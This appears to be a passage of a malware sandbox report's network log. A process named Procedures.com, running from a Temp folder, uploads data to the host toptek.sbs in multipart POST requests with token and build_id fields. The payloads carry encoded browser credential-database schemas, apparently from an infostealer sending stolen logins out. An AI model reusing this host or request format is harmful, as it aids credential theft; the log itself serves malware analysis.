                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                  Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:33 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  29192.168.2.54997394.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----UKNYC2VKNGV37Q9R9R9H
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 262605
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------UKNYC2VKNGV37Q9R9R9HCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                  Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:34 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:35 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  30192.168.2.54997894.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----L6XTRQ1VS0ZM7Q9HD26X
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 393697
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 54 52 51 31 56 53 30 5a 4d 37 51 39 48 44 32 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------L6XTRQ1VS0ZM7Q9HD26XContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------L6XTRQ1VS0ZM7Q9HD26XCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
